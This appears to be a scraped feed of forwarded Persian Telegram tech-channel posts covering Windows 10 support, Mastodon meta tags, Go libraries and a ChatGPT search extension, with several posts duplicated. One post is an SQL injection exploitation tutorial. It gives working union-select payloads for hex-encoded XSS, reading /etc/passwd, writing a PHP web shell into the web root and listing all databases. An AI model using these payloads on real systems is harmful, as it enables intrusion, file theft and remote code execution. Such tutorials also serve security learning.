Forwarded from Geek Alerts
پشتیبانی مایکروسافت از ویندوز ۱۰، مهر ۱۴۰۴ تموم میشه و بعد این تاریخ ویندوز ۱۰ دیگه امن نیست، حالا تو خبر جدید گفته اگه میخواید آپدیتهای امنیتی بعد این تاریخ برای ویندوز ۱۰ شما انجام بشه باید سالانه ۳۰ دلار پرداخت کنید.
در واقع کاربرها به خاطر پیششرط داشتن ماژول TPM 2.0 نمیتونن از ویندوز ۱۰ به ویندوز ۱۱ آپدیت کنن.
این ماژول روی تمام دستگاههای جدیدی که چند سال اخیر تولید شدن وجود داره، اما اگه لپتاپ یا سیستم قدیمی داشته باشید امکان آپدیت به ویندوز ۱۱ نیست.
از طرفی البته ماژول TPM 2.0 رو میشه به صورت جداگانه با قیمت ۲۰ دلار تهیه کرد و روی مادربورد نصب کرد که البته در ایران این ماژول خیلی کمیاب هست.
windows
@geekalerts
در واقع کاربرها به خاطر پیششرط داشتن ماژول TPM 2.0 نمیتونن از ویندوز ۱۰ به ویندوز ۱۱ آپدیت کنن.
این ماژول روی تمام دستگاههای جدیدی که چند سال اخیر تولید شدن وجود داره، اما اگه لپتاپ یا سیستم قدیمی داشته باشید امکان آپدیت به ویندوز ۱۱ نیست.
از طرفی البته ماژول TPM 2.0 رو میشه به صورت جداگانه با قیمت ۲۰ دلار تهیه کرد و روی مادربورد نصب کرد که البته در ایران این ماژول خیلی کمیاب هست.
windows
@geekalerts
Forwarded from Geniuses Group (Omid Hekayati)
برای پیاده سازی مفهوم aggregate (نه محدود به تبیین ارائه شده در DDD) ترجیح شما کدام لایه است؟ با فرض لایه های کلی زیر، فکر می کنید کدام لایه پاسخ مناسب تری برای پیاده سازی این مفهوم هست؟ (دلیل را هم کامنت بذارید که عالی میشه)
Anonymous Poll
46%
Storage (DB, by join function)
37%
Business Logic
17%
GUI
Forwarded from Web Application Security
آسیب پذیری SQL injection =
از اونجایی که هرکسی با مقدمات این آسیب پذیری و اکسپلویتش به روش union رو بلده، خودِ آسیب پذیری رو توضیح نمیدیم و مستقیم میریم سراغ نکاتی که در این آسیب پذیری باید رعایت کنیم.
فرض کنین که با order by تعداد column های وب سایت رو به دست آوردیم و دستور union select ما به این شکله:
1⃣
بعد از مشاهده ی خروجی دستور union select میتونیم به جای عددهایی که تو خروجی به ما نشون داده میشه، پیلود XSS بزنیم. ولی باید پیلود رو به hex تبدیل کنیم و قبلش 0x رو قرار بدیم. برای مثال پیلود
و XSS اتفاق میفته.
2⃣
با دستور load_file میتونیم در mysql فایل بخونیم.
نکته: برای کار با فایل ها باید privilege لازم رو در دیتابیس و سیستم عامل داشته باشیم.
برای خوندن فایل passwd با SQLi:
3⃣
با دستور outfile میتونیم فایل بسازیم با محتوای دلخواه.
نکته: میتونیم کد مخرب رو درون یه فایل php قرار بدیم و RCE بگیریم.
واسه کار کردن این پیلود، همون طور که قبلا گفتیم باید دسترسی های لازم رو داشته باشیم. و همچنین باید فایل رو در مسیر وب سرور بسازیم که با مرورگر قابل دسترسی باشه و در آخر تنها باید فایل رو باز کنیم به شکل زیر:
4⃣
با استفاده از دستورات زیر داخل select میتونیم یوزر و نام دیتابیس جاری رو به دست بیاریم.
ممکنه یوزر sql ما به دیتابیس های بیشتری دسترسی داشته باشه در صورتی که خیلی وقتا فقط اطلاعات دیتابیس جاری رو dump میگیریم و اصلا سراغ بقیه دیتابیس ها نمیریم.
به دست آوردن لیست همه ی دیتابیس ها:
بعد از انتخاب دیتابیس مدنظر، مراحل اکسپلویت رو به روش group_concat که در اکسپلویت های عادی هم استفاده میکنیم جلو میبریم با این تفاوت که به جای ()database در پیلود که به دیتابیس جاری اشاره میکند، اسم دیتابیسی که به دست آوردیم رو قرار میدیم.
#SQLi
از اونجایی که هرکسی با مقدمات این آسیب پذیری و اکسپلویتش به روش union رو بلده، خودِ آسیب پذیری رو توضیح نمیدیم و مستقیم میریم سراغ نکاتی که در این آسیب پذیری باید رعایت کنیم.
فرض کنین که با order by تعداد column های وب سایت رو به دست آوردیم و دستور union select ما به این شکله:
app.php?id=-1 union select 1,2,3,4,5,6,7,8,9--
1⃣
تبدیل SQLi به XSS:بعد از مشاهده ی خروجی دستور union select میتونیم به جای عددهایی که تو خروجی به ما نشون داده میشه، پیلود XSS بزنیم. ولی باید پیلود رو به hex تبدیل کنیم و قبلش 0x رو قرار بدیم. برای مثال پیلود
<img/src/onerror=alert(document.domain)> وقتی تبدیل به hex میشه خروجی 3c696d672f7372632f6f6e6572726f723d616c65727428646f63756d656e742e646f6d61696e293e رو داریم. در نهایت پیلود ما به شکل زیر تغییر میکنه با اضافه کردن 0x قبل از مقدار hex.app.php?id=-1 union select 1,0x3c696d672f7372632f6f6e6572726f723d616c65727428646f63756d656e742e646f6d61696e293e,3,4,5,6,7,8,9--
و XSS اتفاق میفته.
2⃣
خوندن فایل های درون سرور:با دستور load_file میتونیم در mysql فایل بخونیم.
نکته: برای کار با فایل ها باید privilege لازم رو در دیتابیس و سیستم عامل داشته باشیم.
برای خوندن فایل passwd با SQLi:
app.php?id=-1 union select 1,load_file('/etc/passwd'),3,4,5,6,7,8,9--3⃣
ساختن و نوشتن فایل درون سرور:با دستور outfile میتونیم فایل بسازیم با محتوای دلخواه.
app.php?id=-1 union select 1,'hacked' into outfile '/tmp/hacked.txt',3,4,5,6,7,8,9--
نکته: میتونیم کد مخرب رو درون یه فایل php قرار بدیم و RCE بگیریم.
app.php?id=-1 union select 1,'<?php system($_GET['cmd']); ?>' into outfile '/var/www/html/shell.php',3,4,5,6,7,8,9--
واسه کار کردن این پیلود، همون طور که قبلا گفتیم باید دسترسی های لازم رو داشته باشیم. و همچنین باید فایل رو در مسیر وب سرور بسازیم که با مرورگر قابل دسترسی باشه و در آخر تنها باید فایل رو باز کنیم به شکل زیر:
shell.php?cmd=whoami
4⃣
دسترسی به سایر دیتابیس ها:با استفاده از دستورات زیر داخل select میتونیم یوزر و نام دیتابیس جاری رو به دست بیاریم.
database()
@@database
Version()
@@version
ممکنه یوزر sql ما به دیتابیس های بیشتری دسترسی داشته باشه در صورتی که خیلی وقتا فقط اطلاعات دیتابیس جاری رو dump میگیریم و اصلا سراغ بقیه دیتابیس ها نمیریم.
به دست آوردن لیست همه ی دیتابیس ها:
app.php?id=-1 union select 1,group_concat(schema_name),3,4,5,6,7,8,9 from information_schema.schemata--
بعد از انتخاب دیتابیس مدنظر، مراحل اکسپلویت رو به روش group_concat که در اکسپلویت های عادی هم استفاده میکنیم جلو میبریم با این تفاوت که به جای ()database در پیلود که به دیتابیس جاری اشاره میکند، اسم دیتابیسی که به دست آوردیم رو قرار میدیم.
#SQLi
Forwarded from ⚝ (Amir Hossein "Amiria" Maher)
The United States of America is such a glorious mess of contradiction, such a crazy quilt of competing themes, such a fecund mishmash of people and ideas, that defining us is pretty much pointless. There is, of course, a kind of faded notion of "Americana", one that concerns Route 66, diners, freak rock formations, and the like—but even in its halcyon days this "roadside attraction" version of America was never an accurate or nuanced distillation of our massively complicated culture.
— Hampton Sides, Americana: Dispatches from the New Frontier
#quote
@amiria703_channel
Forwarded from ⚝ (Amir Hossein "Amiria" Maher)
seashells.io
Seashells lets you pipe output from command-line programs to the web in real-time.
#FLOSS #tool #معرفی
@amiria703_channel
Seashells lets you pipe output from command-line programs to the web in real-time.
#FLOSS #tool #معرفی
@amiria703_channel
Forwarded from محتوای آزاد سهراب
ماستادون یک ویژگی رو اضافه کرده که به تولیدکنندگان محتوا اجازه میده تا حساب ماستادونشون رو در پیشنمایش لینکها نشون بدن.
برای این کار کافیه تا وارد تنظیماتتون، پابلیک پروفایل بشید و لینک سایتایی که میخواید این ویژگی رو داشته باشن رو وارد کنید.
بعدش وارد وبسایتتون میشید و داخل فایل index.html یا اگر از SSG ها استفاده میکنید داخل مارکداونتون یک
باز کنید و این تگ html رو وارد کنید:
صدالبته باید اینستنس خودتون رو بجای
@username@instance.com
بنویسید :)
@SohrabContents
برای این کار کافیه تا وارد تنظیماتتون، پابلیک پروفایل بشید و لینک سایتایی که میخواید این ویژگی رو داشته باشن رو وارد کنید.
بعدش وارد وبسایتتون میشید و داخل فایل index.html یا اگر از SSG ها استفاده میکنید داخل مارکداونتون یک
<div>
</div>
باز کنید و این تگ html رو وارد کنید:
<meta name="fediverse:creator" content="@[email protected]">
صدالبته باید اینستنس خودتون رو بجای
@username@instance.com
بنویسید :)
@SohrabContents
Forwarded from محتوای آزاد سهراب
و راستی فید بلاگم رو هم درست کردم، این همه وقت الکی خودمو اذیت کردم مشکلش این بود که توی ورکفلو بیلد زولایی که استفاده میشد قدیمی بود :)))
https://blogfa.sohrabbehdani.ir/atom.xml
@SohrabContents
https://blogfa.sohrabbehdani.ir/atom.xml
@SohrabContents
Forwarded from Ninja Learn | نینجا لرن
Forwarded from Gopher Academy
🔵 عنوان مقاله
Watermill: Library for Building Event-Driven Apps
🟢 خلاصه مقاله:
این مقاله به بررسی کتابخانهای برای کار با جریانهای پیام در برنامههای مبتنی بر رویداد میپردازد که امکان پشتیبانی از کانالهای مختلفی مانند Kafka، RabbitMQ، HTTP و حتی binlogs MySQL را فراهم میسازد. این کتابخانه ابزاری قدرتمند برای توسعهدهندگان نرمافزار است تا بتوانند به طور موثرتری اپلیکیشنهای درونران و پاسخگو به رویدادها را بسازند. کاربرد این کتابخانه شامل برقراری ارتباط بین کامپوننتها و سیستمها از طریق جریانهای پیام است که امکان پردازش و تحلیل دادهها را در زمان واقعی فراهم میآورد. دستیابی به این شیوه از ارتباط درون سرویسی این امکان را به توسعهدهندگان میدهد که پیچیدگیهای مدیریت ارتباطات و جریان دادهها را بهینهسازی کنند و بتوانند رابطکاربریهای بیشتر متکی بر اینتراکتیویتی و دادهی مداوم را ارائه دهند. در نهایت، این کتابخانه به فرآیند توسعه اپلیکیشنهای پیچیدهتر و در عین حال کارآمدتر کمک شایانی میکند.
🟣لینک مقاله:
https://golangweekly.com/link/160776/web
➖➖➖➖➖➖➖➖
👑 @gopher_academy
Watermill: Library for Building Event-Driven Apps
🟢 خلاصه مقاله:
این مقاله به بررسی کتابخانهای برای کار با جریانهای پیام در برنامههای مبتنی بر رویداد میپردازد که امکان پشتیبانی از کانالهای مختلفی مانند Kafka، RabbitMQ، HTTP و حتی binlogs MySQL را فراهم میسازد. این کتابخانه ابزاری قدرتمند برای توسعهدهندگان نرمافزار است تا بتوانند به طور موثرتری اپلیکیشنهای درونران و پاسخگو به رویدادها را بسازند. کاربرد این کتابخانه شامل برقراری ارتباط بین کامپوننتها و سیستمها از طریق جریانهای پیام است که امکان پردازش و تحلیل دادهها را در زمان واقعی فراهم میآورد. دستیابی به این شیوه از ارتباط درون سرویسی این امکان را به توسعهدهندگان میدهد که پیچیدگیهای مدیریت ارتباطات و جریان دادهها را بهینهسازی کنند و بتوانند رابطکاربریهای بیشتر متکی بر اینتراکتیویتی و دادهی مداوم را ارائه دهند. در نهایت، این کتابخانه به فرآیند توسعه اپلیکیشنهای پیچیدهتر و در عین حال کارآمدتر کمک شایانی میکند.
🟣لینک مقاله:
https://golangweekly.com/link/160776/web
➖➖➖➖➖➖➖➖
👑 @gopher_academy
GitHub
GitHub - ThreeDotsLabs/watermill: Building event-driven applications the easy way in Go.
Building event-driven applications the easy way in Go. - ThreeDotsLabs/watermill
Forwarded from محتوای آزاد سهراب
یک دستی هم به سر بلاگ انگلیسیم کشیدم، احتمالاً فعالیتم رو توی این هم از سر بگیرم:))
https://sohrabbehdani.ir/blog/
@SohrabContents
https://sohrabbehdani.ir/blog/
@SohrabContents
Forwarded from Python Hints
https://meet.google.com/nxd-uebs-ams
لطفا قبل از ورود میکرفون - ویدئو رو خاموش کنید.
بدون اکانت جیمیل هم وارد نشید
لطفا قبل از ورود میکرفون - ویدئو رو خاموش کنید.
بدون اکانت جیمیل هم وارد نشید
Google
Real-time meetings by Google. Using your browser, share your video, desktop, and presentations with teammates and customers.
Forwarded from DevTwitter | توییت برنامه نویسی
اکستنشن رسمی ChatGPT به طرز عجیبی خوب و قویه، بیچاره سم آلتمن گفت نمیخوام "جو" بدم، ولی این یکی واقعا خوبه!
سم آلتمن درست میگفت.
https://chromewebstore.google.com/detail/chatgpt-search/ejcfepkfckglbgocfkanmcdngdijcgld
@DevTwitter | <Sabber/>
سم آلتمن درست میگفت.
https://chromewebstore.google.com/detail/chatgpt-search/ejcfepkfckglbgocfkanmcdngdijcgld
@DevTwitter | <Sabber/>
Forwarded from Laravel News
Bento Laravel SDK https://laravel-news.com/bento-laravel-sdk
Laravel News
Bento Laravel SDK - Laravel News
Bento, a powerful Email Marketing & Automation Platform, now offers an official Laravel SDK. This streamlined integration allows you to effortlessly send emails and track events directly within your Laravel applications.
Forwarded from Geek Alerts
اکستنشن کروم SearchGPT به نسخه ۱.۱ آپدیت شده و بهنظر میرسه حالا همه کاربرها بهش دسترسی دارن، نکته جالب اینکه تعداد نصبیها تا چند روز پیش ۳۰۰۰ نسخه بود که امروز به ۳۰ هزار نسخه رسیده و در حال افزایش هست.
با نصب کردنش موتور جستجوی پیشفرض کروم تبدیل به SearchGPT میشه و وقتی چیزی رو سرچ میکنید به ChatGPT.com میره و عبارترو با مدل GPT-4o توی اینترنت جستجو میکنه.
برخلاف صحبتهای OpenAI که به چند رسانه بزرگ محدود هست ولی به نظر میرسه به کل دادههای وب و اینترنت دنیا به صورت زنده دسترسی داره.
نکته بعدی اینکه اینرو میتونید روی مرورگرهای کرومبیس مثل edge هم نصب کنید.
ChatGPT search
@geekalerts
با نصب کردنش موتور جستجوی پیشفرض کروم تبدیل به SearchGPT میشه و وقتی چیزی رو سرچ میکنید به ChatGPT.com میره و عبارترو با مدل GPT-4o توی اینترنت جستجو میکنه.
برخلاف صحبتهای OpenAI که به چند رسانه بزرگ محدود هست ولی به نظر میرسه به کل دادههای وب و اینترنت دنیا به صورت زنده دسترسی داره.
نکته بعدی اینکه اینرو میتونید روی مرورگرهای کرومبیس مثل edge هم نصب کنید.
ChatGPT search
@geekalerts